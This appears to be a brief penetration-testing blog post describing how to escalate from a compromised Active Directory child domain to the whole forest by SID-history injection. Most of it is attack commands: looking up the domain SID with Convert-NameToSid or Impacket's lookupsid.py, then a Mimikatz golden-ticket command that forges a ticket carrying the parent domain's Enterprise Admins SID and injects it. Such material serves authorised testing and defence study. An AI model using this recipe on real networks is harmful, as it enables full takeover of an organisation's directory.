PenTest – Child Domain to Forest Compromise – SID Hijacking

| 3 janvier 2024 | Non classé | Aucun commentaire

Most trees are linked with dual sided trust relationships to allow for sharing of resources. By default the first domain created if the Forest Root.

Requirements: – KRBTGT Hash – Find the SID of the domain

$ Convert-NameToSid target.domain.com\krbtgt
S-1-5-21-2941561648-383941485-1389968811-502

# with Impacket
lookupsid.py domain/user:password@10.10.10.10

– Replace 502 with 519 to represent Enterprise Admins – Create golden ticket and attack parent domain.

kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt

 

About The Author

Add a Comment

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *